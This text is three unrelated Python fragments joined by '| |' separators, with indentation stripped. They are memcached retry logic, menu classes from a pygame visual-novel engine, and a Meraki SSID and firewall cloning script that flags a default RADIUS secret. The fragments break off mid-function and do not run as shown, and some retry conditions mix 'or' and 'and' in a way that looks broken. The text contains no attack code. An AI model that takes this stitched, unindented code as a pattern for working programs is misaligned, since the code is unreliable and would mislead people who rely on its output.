mc = self.memcacheds[server_str]
errors = self._setMulti_rec(mc, exp, flags, keyval, pause_sec,
timeout_sec, self._setMulti_seq)
if errors:
self.log.error(list(set(str(error) for error in errors)),
exc_info=1)
raise errors[0]
def _setMulti_parallel(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
tasks = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keyval)) as executor:
for server_str , keyval in server_keyval.items() :
mc = self.memcacheds[server_str]
tasks.append(executor.submit(self._setMulti_rec, mc, exp, flags, keyval, pause_sec, timeout_sec, self._setMulti_parallel))
errors = []
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout_sec):
if future.exception() is not None:
self.log.error("Exception in {0} sec".format(time.time() - now))
raise future.exception()
errors.extend(future.result())
if errors:
self.log.error(list(set(str(error) for error in errors)),
exc_info=1)
raise errors[0]
def _setMulti_rec(self, memcached_client, exp, flags, keyval, pause, timeout, rec_caller_fn):
try:
errors = memcached_client.setMulti(exp, flags, keyval)
if not errors:
return []
elif timeout <= 0:
return errors
else:
# Sleep before calling
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keyval.keys()))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause) # Start all over again for these key vals.
return [] # Note: If used for async,too many recursive threads could get spawn here.
except (EOFError, socket.error) as error:
try:
if "Got empty data (remote died?)" in error.strerror \
or "Timeout waiting for socket" in error.strerror \
or "Broken pipe" in error.strerror \
or "Connection reset by peer" in error.strerror \
and timeout > 0:
# Wait before reset_vbs call
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keyval.keys()))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
else:
return [error]
except AttributeError:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and timeout > 0:
# Wait before reset_vbs call
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keyval.keys()))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
else:
return [error]
except BaseException as error:
if timeout <= 0:
return [error]
else:
# Wait before reset_vbs call
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keyval.keys()))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
def _get_server_keyval_dic(self, key_val_dic):
server_keyval = {}
for key, val in key_val_dic.items():
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keyval :
server_keyval[server_str] = {}
server_keyval[server_str][key] = val
return server_keyval
def getMulti(self, keys_lst, pause_sec=1, timeout_sec=5, parallel=True):
if parallel:
return self._getMulti_parallel(keys_lst, pause_sec, timeout_sec)
else:
return self._getMulti_seq(keys_lst, pause_sec, timeout_sec)
def _getMulti_seq(self, keys_lst, pause_sec=1, timeout_sec=5):
server_keys = self._get_server_keys_dic(keys_lst) # set keys in their respective vbuckets and identify the server for each vBucketId
keys_vals = {}
for server_str , keys in server_keys.items() : # get memcached client against each server and multi get
mc = self.memcacheds[server_str]
keys_vals.update(self._getMulti_from_mc(mc, keys, pause_sec, timeout_sec, self._getMulti_seq))
if len(keys_lst) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(set(keys_lst).difference(keys_vals.keys())))
return keys_vals
def _getMulti_parallel(self, keys_lst, pause_sec=1, timeout_sec=5):
server_keys = self._get_server_keys_dic(keys_lst)
tasks = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keys)) as executor:
for server_str, keys in server_keys.items():
mc = self.memcacheds[server_str]
tasks.append(executor.submit(self._getMulti_from_mc , mc, keys, pause_sec, timeout_sec, self._getMulti_parallel))
keys_vals = self._reduce_getMulti_values(tasks, pause_sec, timeout_sec)
if len(keys_lst) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(set(keys_lst).difference(keys_vals.keys())))
return keys_vals
def _getMulti_from_mc(self, memcached_client, keys, pause, timeout, rec_caller_fn):
try:
return memcached_client.getMulti(keys)
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and timeout > 0:
# Wait before reset_vbs call
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
return rec_caller_fn(keys, pause, timeout - pause)
else:
raise error
except BaseException as error:
if timeout <= 0:
raise | |
not getattr(self.textbox,"kill",0) and self.textbox.can_continue()
class menu(fadesprite,gui.widget):
z = 5
fail = "none"
id_name = "invest_menu"
def over(self,mp):
oy = self.getpos()[1]
for o in self.options:
p2 = self.opos[o]
w,h = self.opt.get_width()//2,self.opt.get_height()//2
if mp[0]>=p2[0] and mp[0]<=p2[0]+w and mp[1]>=p2[1]+oy and mp[1]<=p2[1]+h+oy:
return o
def move_over(self,pos,rel,buttons):
if buttons[0]:
self.click_down_over(pos)
def click_down_over(self,mp):
gui.window.focused = self
o = self.over(mp)
if o is not None:
self.selected = o
def click_up(self,mp):
o = self.over(mp)
if self.selected==o and o is not None:
self.enter_down()
def __init__(self):
self.bg = None
oy = 192
fadesprite.__init__(self,x=0,y=oy)
gui.widget.__init__(self,[0,oy],[assets.sw,assets.sh])
self.load("general/black")
self.max_fade = int(float(assets.variables.get("_menu_fade_level",50)))
self.fade = 0
if self.max_fade == 0:
self.setfade(0)
else:
assets.cur_script.obs.append(fadeanim(start=0,end=self.max_fade,speed=3,wait=1,name=None,obs=[self]))
self.options = []
self.selected = ""
self.opt = assets.open_art("general/talkbuttons",key=[255,0,255])[0]
stx,sty = (assets.sw-self.opt.get_width())/2,(assets.sh-self.opt.get_height())/2
self.opos_c = {"examine":[0,0],"move":[1,0],
"talk":[0,1],"present":[1,1]}
self.opos_l = [["examine","move"],["talk","present"]]
self.opos = {"examine":[stx,sty],"move":[stx+self.opt.get_width()/2,sty],
"talk":[stx,sty+self.opt.get_height()/2],"present":[stx+self.opt.get_width()/2,sty+self.opt.get_height()/2]}
imgs = []
x=y=0
while y<self.opt.get_height():
while x<self.opt.get_width():
imgs.append(self.opt.subsurface([[x,y],[self.opt.get_width()//2,self.opt.get_height()//2]]))
x+=self.opt.get_width()//2
y+=self.opt.get_height()//2+1
x = 0
self.oimgs = {"examine":imgs[0],"move":imgs[1],"talk":imgs[2],"present":imgs[3]}
self.opthigh = assets.open_art("general/talkbuttons_high",key=[255,0,255])[0]
imgs = []
x=y=0
while y<self.opthigh.get_height():
while x<self.opthigh.get_width():
imgs.append(self.opthigh.subsurface([[x,y],[self.opthigh.get_width()//2,self.opthigh.get_height()//2]]))
x+=self.opthigh.get_width()//2
y+=self.opthigh.get_height()//2+1
x = 0
self.oimgshigh = {"examine":imgs[0],"move":imgs[1],"talk":imgs[2],"present":imgs[3]}
self.open_script = True
self.primary = True
def init_normal(self):
subscript("show_court_record_button")
def delete(self):
super(menu,self).delete()
subscript("hide_court_record_button")
def update(self):
if not self.options:
self.delete()
fadesprite.update(self)
self.screen_setting = "try_bottom"
return True
def get_coord(self):
try:
return self.opos_c[self.selected][:]
except:
return [0,0]
def k_right(self):
coord = self.get_coord()
coord[0]+=1
if coord[0]>1:
coord[0] = 0
sel = self.opos_l[coord[1]][coord[0]]
if sel in self.options:
self.selected = sel
subscript("sound_investigate_menu_select")
def k_left(self):
coord = self.get_coord()
coord[0]-=1
if coord[0]<0:
coord[0] = 1
sel = self.opos_l[coord[1]][coord[0]]
if sel in self.options:
self.selected = sel
subscript("sound_investigate_menu_select")
def k_up(self):
coord = self.get_coord()
coord[1]-=1
if coord[1]<0:
coord[1] = 1
sel = self.opos_l[coord[1]][coord[0]]
if sel in self.options:
self.selected = sel
subscript("sound_investigate_menu_select")
def k_down(self):
coord = self.get_coord()
coord[1]+=1
if coord[1]>1:
coord[1] = 0
sel = self.opos_l[coord[1]][coord[0]]
if sel in self.options:
self.selected = sel
subscript("sound_investigate_menu_select")
def enter_down(self):
if self.open_script:
print "INITIALIZE MENU SCENE"
assets.cur_script.init(self.scene+"."+self.selected)
else:
print "TRY TO JUMP TO LABEL"
assets.cur_script.goto_result(self.selected,backup=self.fail)
self.delete()
subscript("sound_investigate_menu_confirm")
def addm(self,opt):
if opt:
self.options.append(opt)
if not self.selected:
self.selected = opt
def delm(self,opt):
if opt in self.options:
self.options.remove(opt)
if self.selected == opt:
self.selected = None
def draw(self,dest):
if not self.bg:
for o in reversed(assets.cur_script.obs):
if isinstance(o,bg):
self.bg = o.img.copy()
break
self.screen_setting = "try_bottom"
if self.bg:
dest.blit(self.bg,self.getpos())
if not hasattr(self,"fade") or self.fade>=self.max_fade:
for o in self.options:
if self.selected == o:
dest.blit(self.oimgshigh[o],[self.opos[o][0],self.opos[o][1]+self.getpos()[1]])
else:
dest.blit(self.oimgs[o],[self.opos[o][0],self.opos[o][1]+self.getpos()[1]])
class listmenu(fadesprite,gui.widget):
fail = "none"
id_name = "list_menu_id"
def over(self,mp):
if getattr(self,"kill",0):
return False
x = (assets.sw-self.choice.img.get_width())/2
y = self.getpos()[1]+30
si = None
i = 0
for c in self.options:
if mp[0]>=x and mp[1]>=y and mp[0]<=x+self.choice.width and mp[1]<=y+self.choice.height:
si = i
i+=1
y+=self.choice.img.get_height()+5
return si
def move_over(self,pos,rel,buttons):
if getattr(self,"kill",0):
return False
if buttons[0]:
self.click_down_over(pos)
def click_down_over(self,mp):
if getattr(self,"kill",0):
return False
gui.window.focused = self
si = self.over(mp)
if si is not None:
self.si = si
self.selected = self.options[self.si]
def click_up(self,mp):
if getattr(self,"kill",0):
return False
si = self.over(mp)
if self.si==si and si is not None:
self.enter_down()
def __init__(self,tag=None):
self.pri = ulayers.index(self.__class__.__name__)
x,y = 0,192
gui.widget.__init__(self,[x,y],[assets.sw,assets.sh])
fadesprite.__init__(self,x=x,y=y)
self.load(assets.variables.get("_list_bg_image","general/black"))
self.max_fade = int(float(assets.variables.get("_menu_fade_level",50)))
self.fade = 0
if assets.num_screens == 2 and not vtrue(assets.variables.get("_double_screen_list_fade","false")):
self.setfade(255)
elif self.max_fade == 0:
self.setfade(0)
else:
assets.cur_script.obs.append(fadeanim(start=0,end=self.max_fade,speed=3,wait=1,name=None,obs=[self]))
self.options = []
self.si = 0
self.selected = ""
self.choice = fadesprite().load("general/talkchoice")
self.choice_high = fadesprite().load("general/talkchoice_high")
self.hidden = True
self.tag = tag
self.primary = True
def init_normal(self):
subscript("show_court_record_button")
def delete(self):
subscript("hide_court_record_button")
self.kill = 1
if hasattr(self,"bck"):
self.bck.kill = 1
def update(self):
fadesprite.update(self)
self.screen_setting = "try_bottom"
if self.hidden:
return False
if not hasattr(self,"bck") and vtrue(assets.variables.get("_list_back_button","true")) and not getattr(self,"noback",False):
self.bck = guiBack()
self.bck.pri = 1000
def k_space(b=self.bck):
self.delete()
subscript("sound_list_menu_cancel")
print "kill back button and self"
assets.variables["_selected"] = "Back"
self.bck.k_space = k_space
assets.cur_script.obs.append(self.bck)
if not self.options:
self.k_space()
return True
def k_up(self):
if getattr(self,"kill",0):
return False
self.si -= 1
if self.si<0:
self.si = len(self.options)-1
self.selected = self.options[self.si]
self.change_selected()
subscript("sound_list_menu_select")
def k_down(self):
if getattr(self,"kill",0):
return False
self.si += 1
if self.si>=len(self.options):
self.si = 0
self.selected = self.options[self.si]
self.change_selected()
subscript("sound_list_menu_select")
def enter_down(self):
if getattr(self,"kill",0):
return False
if not self.selected:
return
subscript("sound_list_menu_confirm")
if self.tag:
assets.lists[self.tag][self.selected["label"]] = 1
if self.selected["result"] != "Back":
assets.variables["_selected"] = self.selected["result"]
assets.cur_script.goto_result(self.selected["result"],backup=self.fail)
else:
assets.variables["_selected"] = "Back"
self.delete()
def change_selected(self):
scr = self.options[self.si].get("on_select",None)
if scr:
assets.cur_script.execute_macro(scr)
#subscript(scr)
def draw(self,dest):
if getattr(self,"kill",0):
return False
if not self.selected and self.options:
self.selected = self.options[self.si]
self.change_selected()
fadesprite.draw(self,dest)
x = (assets.sw-self.choice.img.get_width())/2
y = self.getpos()[1]+30
#self.choice.setfade(200)
#self.choice_high.setfade(200)
for c in self.options:
if 0:#self.selected == c:
img = self.choice_high.img.copy()
else:
img = self.choice.img.copy()
rt = c["label"]
checkmark = assets.variables.get("_list_checked_img","general/checkmark")
if "checkmark" in c:
checkmark = c["checkmark"]
try:
checkmark = sprite().load(checkmark)
except:
checkmark = None
if (not (checkmark and checkmark.width)) and self.tag and assets.lists[self.tag].get(rt,None):
rt = "("+rt+")"
txt = assets.get_image_font("list").render(rt,[110,20,20])
img.blit(txt,[(img.get_width()-txt.get_width())/2,
(img.get_height()-txt.get_height())/2])
dest.blit(img,[x,y])
if self.selected == c:
lwi = 2
color = color_str(assets.variables.get("_list_outline_color","ffaa45"))
pygame.draw.line(dest,color,[x-1,y+8],[x-1,y+1],lwi)
pygame.draw.line(dest,color,[x+1,y-2],[x+8,y-2],lwi)
pygame.draw.line(dest,color,[x+img.get_width(),y+8],[x+img.get_width(),y+1],lwi)
pygame.draw.line(dest,color,[x+img.get_width()-2,y-2],[x+img.get_width()-9,y-2],lwi)
pygame.draw.line(dest,color,[x+img.get_width(),y+img.get_height()-2],[x+img.get_width(),y+img.get_height()-9],lwi)
pygame.draw.line(dest,color,[x+img.get_width()-2,y+img.get_height()],[x+img.get_width()-9,y+img.get_height()],lwi)
pygame.draw.line(dest,color,[x-1,y+img.get_height()-2],[x-1,y+img.get_height()-9],lwi)
pygame.draw.line(dest,color,[x+1,y+img.get_height()],[x+8,y+img.get_height()],lwi)
if checkmark and checkmark.width and self.tag and assets.lists[self.tag].get(rt,None):
if "check_x" in c:
cx = int(c["check_x"])
else:
cx = int(assets.variables.get("_list_checked_x","-10"))
if "check_y" in c:
cy = int(c["check_y"])
else:
cy = int(assets.variables.get("_list_checked_y","-10"))
dest.blit(checkmark.base[0],[x+cx,y+cy])
y+=self.choice.img.get_height()+5
def k_space(self):
if getattr(self,"kill",0):
return False
if hasattr(self,"bck") or "Back" in self.options:
self.delete()
subscript("sound_list_menu_cancel")
class case_menu(fadesprite,gui.widget):
children = []
parent = None
def click_down_over(self,mp):
surf,pos = self.option_imgs[self.choice*3]
new,npos = self.option_imgs[self.choice*3+1]
save,spos = self.option_imgs[self.choice*3+2]
pos = pos[:]
pos[0]-=self.x
if mp[0]<pos[0]:
self.k_left()
elif mp[0]>pos[0]+surf.get_width():
self.k_right()
else:
if new and mp[1]>=npos[1] and mp[1]<=npos[1]+new.get_height():
self.enter_down()
elif save and mp[1]>=spos[1] and mp[1]<=spos[1]+save.get_height():
assets.game = self.path+"/"+self.options[self.choice]
assets.load_game_menu()
#assets.load_game(self.path+"/"+self.options[self.choice])
def get_script(self,fullpath):
dname = os.path.split(fullpath)[1]
for test in [[fullpath+"/intro.txt","intro"],[fullpath+"/"+dname+".txt",dname]]:
if os.path.exists(test[0]):
return test[1]
def __init__(self,path="games",**kwargs):
self.pri = kwargs.get("pri",ulayers.index(self.__class__.__name__))
self.reload=False
self.path = path
fadesprite.__init__(self,screen=2)
self.base = self.img = assets.Surface([64,64])
self.max_fade = 150
self.next = 0
self.width = assets.sw
self.height = assets.sh
self.options = []
order = assets.variables.get("_order_cases","alphabetical")
if order=="alphabetical":
for d in os.listdir(path):
full = os.path.join(path,d)
if os.path.isdir(full):
if self.get_script(full):
self.options.append(d)
self.options.sort()
elif order=="variable":
opts = {}
for v in assets.variables.keys():
if v.startswith("_case_"):
try:
num = int(v[6:])
opts[num] = assets.variables[v]
except:
continue
self.options = []
keys = opts.keys()
keys.sort()
for k in keys:
self.options.append(opts[k])
else:
raise script_error("_order_cases set to '%s',"%(order,)+\
"only valid values are 'alphabetical' or "+\
"'variable'")
self.init_options()
self.choice = 0
self.x = 0
try:
f = open(path+"/last")
self.choice = int(f.readlines()[0].strip())
f.close()
except:
pass
if self.choice>=len(self.options):
self.choice = 0
self.scrolling = False
self.arr = assets.open_art("general/arrow_right")[0]
self.tried_case = False
self.primary = True
def delete(self):
super(case_menu,self).delete()
def init_options(self):
self.option_imgs = []
base = assets.open_art("general/selection_chapter")[0].convert()
x = self.pos[0]+assets.sw/2-base.get_width()/2
y = self.pos[1]+assets.sh/2-base.get_height()/2
for o in self.options:
spr = base.copy()
title = o.replace("_"," ")
lines = [[]]
wd_sp = 2
for word in title.split(" "):
word = assets.get_font("gametitle").render(word,1,[200,100,100])
if sum([wd.get_width() for wd in lines[-1]])+wd_sp*len(lines[-1])+word.get_width()>160:
lines.append([])
lines[-1].append(word)
wd_y = spr.get_height()//2-(len(lines)*16)//2
for line in lines:
w = sum([wd.get_width() for wd in line])+wd_sp*len(line)
wd_x = (spr.get_width()-w)/2
for word in line:
spr.blit(word,[wd_x,wd_y])
wd_x += word.get_width()+wd_sp
wd_y += 16
self.option_imgs.append([spr,[x,y]])
fnt = assets.get_font("new_resume")
txt = fnt.render("New game",1,[200,100,100])
spr = pygame.transform.scale(base,[base.get_width(),base.get_height()//2])
spr.blit(txt,[(spr.get_width()-txt.get_width())/2,(spr.get_height()-txt.get_height())/2])
self.option_imgs.append([spr,[x,y+60]])
if os.path.exists(self.path+"/"+o+"/save.ns"):
txt = fnt.render("Resume Game",1,[200,100,100])
spr = pygame.transform.scale(base,[base.get_width(),base.get_height()//2])
spr.blit(txt,[(spr.get_width()-txt.get_width())/2,(spr.get_height()-txt.get_height())/2])
self.option_imgs.append([spr,[x,y+90]])
elif os.path.exists(self.path+"/"+o+"/save"):
txt = fnt.render("Resume Game",1,[200,100,100])
spr = pygame.transform.scale(base,[base.get_width(),base.get_height()//2])
spr.blit(txt,[(spr.get_width()-txt.get_width())/2,(spr.get_height()-txt.get_height())/2])
self.option_imgs.append([spr,[x,y+90]])
elif os.path.exists(self.path+"/"+o+"/autosave.ns"):
txt = fnt.render("Resume Game",1,[200,100,100])
spr = pygame.transform.scale(base,[base.get_width(),base.get_height()//2])
spr.blit(txt,[(spr.get_width()-txt.get_width())/2,(spr.get_height()-txt.get_height())/2])
self.option_imgs.append([spr,[x,y+90]])
else:
self.option_imgs.append([None,None])
x+=assets.sw
self.children = self.option_imgs
def update(self):
if self.reload:
self.option_imgs = []
self.__init__(self.path)
spd = (self.choice*256-self.x)/25.0
if abs(spd)>0 and abs(spd)<10:
spd = 10*abs(spd)/spd
spd *= assets.dt
if self.x<self.choice*assets.sw:
self.x+=spd
if self.x>self.choice*assets.sw:
self.x=self.choice*assets.sw
if self.x>self.choice*assets.sw:
self.x+=spd
if self.x<self.choice*assets.sw:
self.x=self.choice*assets.sw
return True
def k_right(self):
if self.choice<len(self.options)-1:
self.choice += 1
subscript("sound_case_menu_select")
self.case_screen()
def k_left(self):
if self.choice>0:
self.choice -= 1
subscript("sound_case_menu_select")
self.case_screen()
def case_screen(self):
if not self.options:
return
if not hasattr(self,"curgame"):
self.curgame = assets.game
if os.path.exists(os.path.join(self.path,self.options[self.choice],"case_screen.txt")):
scr = assets.Script()
scr.parent = assets.cur_script
assets.stack.append(scr)
assets.game=self.curgame+"/"+self.options[self.choice]
assets.registry = registry.combine_registries("./"+assets.game,assets.show_load)
print "init: g:%s choice:%s"%(assets.game,self.options[self.choice])
assets.cur_script.init("case_screen")
assets.cur_script.world = scr.parent.world
def enter_down(self):
f = open(os.path.join(self.path,"last"),"w")
f.write(str(self.choice))
f.close()
assets.start_game(self.path+"/"+self.options[self.choice],mode="nomenu")
def draw(self,dest):
if self.reload:
return
if not self.tried_case:
self.case_screen()
self.tried_case = 1
for s,p in self.option_imgs:
if not s: continue
dest.blit(s,[p[0]-self.x,p[1]])
if self.x==self.choice*assets.sw:
if self.choice<len(self.options)-1:
dest.blit(self.arr,[self.pos[0]+240,self.pos[1]+80])
if self.choice>0:
dest.blit(pygame.transform.flip(self.arr,1,0),[self.pos[0],self.pos[1]+80])
class examine_menu(sprite,gui.widget):
fail = "none"
def move_over(self,pos,rel,buttons):
if self.xscrolling:
return
if gui.window.focused == self:
self.mx,self.my = [pos[0],pos[1]-self.getpos()[1]]
self.highlight()
def click_down_over(self,mp):
if self.xscrolling:
return
gui.window.focused = self
if self.hide or self.selected == ["none"] or mp[0]<175 or mp[1]<159+self.getpos()[1]:
self.move_over(mp,None,None)
def click_up(self,mp):
if self.xscrolling:
return
if gui.window.focused == self:
| |
= config['RAD_KEYS'][temp_SSID['name']].replace('"','').replace(' ','')
if "meraki123!" in secret:
print(f'\t\t{bc.FAIL}Using DEFAULT!!! Radius Secret [{bc.WARNING}{secret}{bc.FAIL}]')
#sys.exit(1)
if 'radiusServers' in temp_SSID:
#print(f'{bc.OKGREEN}Using Secret [{bc.WARNING}{secret}{bc.OKGREEN}]')
for rs in temp_SSID['radiusServers']:
rs['secret'] = secret
if 'radiusAccountingServers' in temp_SSID:
for ras in temp_SSID['radiusAccountingServers']:
ras['secret'] = secret
### END OF THE OVERRIDES/EXCEPTIONS
try:
#print(f'Writing {temp_SSID}')
if self.WRITE:
self.ssids[temp_SSID['number']] = self.db.wireless.updateNetworkWirelessSsid(self.net_id,**temp_SSID)
self.CLEAN = False
except:
print(f'Error writing SSID[{temp_SSID["name"]}]')
print(temp_SSID)
print("Unexpected error:", sys.exc_info())
raise
#Clone the L3 FW rules
if not self.compare(self.ssids_l3[i], master.ssids_l3[i]):
#print(f'L3 is not the same')
print(f'\t\t-{bc.OKBLUE} Copied L3 rules for SSID[{self.ssids[i]["name"]}] ')
lanAccess = True
l3rules = copy.deepcopy(master.ssids_l3[i])
newL3 = {}
newL3['rules'] = []
for rule in l3rules['rules']:
if rule['destCidr'] == "Local LAN":
if rule['policy'] == "deny": lanAccess = False
else: lanAccess = True
l3rules['rules'].remove(rule) #pull out the allow Lan Access rule, it's boolean
if rule['comment'] == "Default rule" or not rule['destCidr'] == "Local LAN":
newL3['rules'].append(rule) #pull out default rule, always the same
#print(f'L3 Rules are {newL3}')
newL3['allowLanAccess'] = lanAccess
if self.WRITE:
self.ssids_l3[i] = self.db.wireless.updateNetworkWirelessSsidFirewallL3FirewallRules(self.net_id,i, **newL3)
self.CLEAN = False
CLEAN_L3 = False
#Clone the L7 FW rules
if not self.compare(self.ssids_l7[i], master.ssids_l7[i]):
l7rules = copy.deepcopy(master.ssids_l7[i])
#print(f'L7 not the same ... cloning')
print(f'\t\t-{bc.OKBLUE} Copied L7 rules for SSID[{self.ssids[i]["name"]}] ')
if self.WRITE:
self.ssids_l7[i] = self.db.wireless.updateNetworkWirelessSsidFirewallL7FirewallRules(self.net_id,i, **l7rules)
self.CLEAN = False
CLEAN_L7 = False
#Clone the TS Rules
if not self.compare(self.ssids_ts[i], master.ssids_ts[i]):
print(f'\t\t-{bc.OKBLUE} Copied Traffic Shaping rules for SSID[{self.ssids[i]["name"]}] ')
try:
TSrules = copy.deepcopy(master.ssids_ts[i])
if self.WRITE:
self.ssids_ts[i] = self.db.wireless.updateNetworkWirelessSsidTrafficShapingRules(self.net_id, i, **TSrules)
self.CLEAN = False
CLEAN_TS = False
except:
print(f'\t\t-{bc.FAIL}Failed to update TrafficShaping. Make sure all rules are complete{bc.ENDC}')
#This might not be needed, so could increase sync time.
#if not self.CLEAN:
#self.u_getSSIDS() #this also updates ssids_range
#if self.hasAironetIE: self.u_getSSIDS_aie()
#if not CLEAN_L3: self.u_getSSIDS_l3()
#if not CLEAN_L7: self.u_getSSIDS_l7()
#if not CLEAN_TS: self.u_getSSIDS_ts()
#self.CLEAN = True
#if len(self.ssids_range) == len(master.ssids_range)
try:
for i in self.ssids_range: # and self.hasAironetIE:
if self.hasAironetIE and not self.compare(self.aironetie[i], master.aironetie[i]):
if self.WRITE:
self.CLEAN = False
self.setaironetie(self.net_id, i, master.aironetie[i])
print(f'{bc.OKBLUE}\t\tConfiguring AironetIE[{bc.WARNING}{master.aironetie[i]}{bc.OKBLUE}] on SSID[{bc.WARNING}{i}{bc.OKBLUE}]{bc.ENDC}')
except:
print(f'Master ssid_range[{master.ssid_range}] ssid_aironetie[{master.aironetie}]')
print(f'Self ssid_range[{self.ssid_range}] ssid_aironetie[{self.aironetie}]')
#sys.exit(1)
self.u_getSSIDS()
self.u_getSSIDS_aie()
if not self.CLEAN:
if self.hasAironetIE:
self.hasAironetIE = None
self.u_getSSIDS_aie()
self.CLEAN = True
#RFProfiles - (if it exists and not equal, delete/update. If it doesn't exist, create)
self_RFPS= copy.deepcopy(self.getNetworkWirelessRfProfiles)
master_RFPS = copy.deepcopy(master.getNetworkWirelessRfProfiles)
for srfp in self_RFPS:
srfp.pop('id')
srfp.pop('networkId')
for mrfp in master_RFPS:
mrfp.pop('id')
mrfp.pop('networkId')
if not self.compare(self_RFPS,master_RFPS): #Profiles are NOT the same
for masterRF in master.getNetworkWirelessRfProfiles:
found = False
for selfRF in self.getNetworkWirelessRfProfiles:
if masterRF['name'] == selfRF['name']:
#print(f'RF Profile[{masterRF["name"]}] FOUND')
found = True
if not self.soft_compare(masterRF, selfRF): #It's in there but might not be the same
print(f'\t{bc.OKBLUE}RF Profile[{bc.WARNING}{masterRF["name"]}{bc.OKBLUE}] !!! Updating RF Profile{bc.ENDC}')
newRF = copy.deepcopy(masterRF)
newRF.pop('id')
newRF.pop('networkId')
newRF.pop('name')
newRF = self.MR_rfp_pwr(newRF)
if self.WRITE:
self.db.wireless.updateNetworkWirelessRfProfile(self.net_id,selfRF['id'], **newRF)
self.CLEAN = False
#no more RFProfiles in self, create one
if not found:
print(f'\t{bc.OKBLUE}RF Profile[{bc.WARNING}{masterRF["name"]}{bc.OKBLUE}]!!! New RFP created in network{bc.ENDC}')
newRF = copy.deepcopy(masterRF)
newRF.pop('id')
newRF.pop('networkId')
newRF = self.MR_rfp_pwr(newRF)
if self.WRITE:
self.db.wireless.createNetworkWirelessRfProfile(self.net_id,**newRF)
self.CLEAN = False
#wouldn't be here without something being different, so at least resync this part
if not self.CLEAN:
self.u_getNetworkWirelessRfProfiles()
self.CLEAN = True
#SSIDS_iPSK
#for ssid_num in range(0,15):
ipsk_tmp = []
for r in range(0,15):
ipsk_tmp.append({})
for ssid_num in self.ssids_range:
#if not ssid_num in self.ssids_range: continue
#ipsk_tmp.append({}) #keep track of master iPSKs so we can remove unused ones from local(self)
for m_ipsk in master.ssids_ipsk[ssid_num]:
if not m_ipsk['name'] in ipsk_tmp[ssid_num]:
ipsk_tmp[ssid_num][m_ipsk['name']] = m_ipsk['passphrase']
#ipsks are not empty, find the matching group policy
new_ipsk = copy.deepcopy(m_ipsk)
new_ipsk.pop('id') #pop off the ID from master, new one will be created "local"
master_GP_tmp = master.find_fromGPID(master.getNetworkGroupPolicies, str(new_ipsk['groupPolicyId']))
local_GP_tmp = self.find_fromName(self.getNetworkGroupPolicies, str(master_GP_tmp['name']))
new_ipsk['groupPolicyId'] = local_GP_tmp['groupPolicyId']
exists = False
for s_ipsk in self.ssids_ipsk[ssid_num]:
if new_ipsk['name'] == s_ipsk['name']:
exists = True #exists, ignore unless passwords are different
if not new_ipsk['passphrase'] == s_ipsk['passphrase']: #if passwords are different, delete the ipsk and re-create
if self.WRITE:
self.CLEAN = False
try:
self.db.wireless.deleteNetworkWirelessSsidIdentityPsk(self.net_id, ssid_num, s_ipsk['id'])
except:
print(f'ERROR: iPSK Issue, resyncing and trying again')
self.u_getSSIDS_ipsk()
self.db.wireless.deleteNetworkWirelessSsidIdentityPsk(self.net_id, ssid_num, s_ipsk['id'])
exists = False
if not exists and self.WRITE:
self.CLEAN = False
try:
self.db.wireless.createNetworkWirelessSsidIdentityPsk(self.net_id, ssid_num, **new_ipsk)
except:
print(f'{bc.FAIL}iPSK already created or still there{bc.ENDC}')
if not self.CLEAN:
self.u_getSSIDS_ipsk()
self.CLEAN = True
#cleanUP local iPSK
for ssid_num in self.ssids_range:
for s_ipsk in self.ssids_ipsk[ssid_num]:
if not s_ipsk['name'] in ipsk_tmp[ssid_num]:
if self.WRITE:
self.CLEAN = False
print(f'\t\t{bc.OKBLUE}-Removing Legacy iPSK[{s_ipsk["name"]}]{bc.ENDC}')
self.db.wireless.deleteNetworkWirelessSsidIdentityPsk(self.net_id, ssid_num, s_ipsk['id'])
### Clone Wireless Settings
if not self.compare(master.getNetworkWirelessSettings, self.getNetworkWirelessSettings):
if self.WRITE:
print(f'\t{bc.OKBLUE}-Updating Wireless Settings in network {bc.WARNING}{self.name}{bc.ENDC}')
self.CLEAN = False
self.db.wireless.updateNetworkWirelessSettings(self.net_id,**master.getNetworkWirelessSettings)
if not self.CLEAN:
self.u_getNetworkWirelessSettings()
self.CLEAN = True
### /end-Wifi Settings
## Clone Bluetooth/IOT Settings
if not self.compare(master.getNetworkWirelessBluetoothSettings, self.getNetworkWirelessBluetoothSettings):
if self.WRITE:
print(f'\t{bc.OKBLUE}-Updating Bluetooth/IOT Settingsin network {bc.WARNING}{self.name}{bc.ENDC}')
self.CLEAN = False
btCFG = master.getNetworkWirelessBluetoothSettings
self.db.wireless.updateNetworkWirelessBluetoothSettings(self.net_id,**btCFG)
if not self.CLEAN:
self.u_getNetworkWirelessBluetoothSettings()
self.CLEAN = True
## / end-Bluetooth/IOT
if not self.CLEAN:
print(f'ERROR: Something when horribly wrong.... unclean clone....')
sys.exit()
#self.sync() #if this object is CLEAN, then you shouldn't have to re-sync (basically rebuilding it from scratch)
return
#Helper function in order to set minimal power levels via API. Below certain values, API's will error out.
def MR_rfp_pwr(self, RFP):
if 'twoFourGhzSettings' in RFP:
if 'minPower' in RFP['twoFourGhzSettings'] and RFP['twoFourGhzSettings']['minPower'] < 5:
RFP['twoFourGhzSettings']['minPower'] = 5
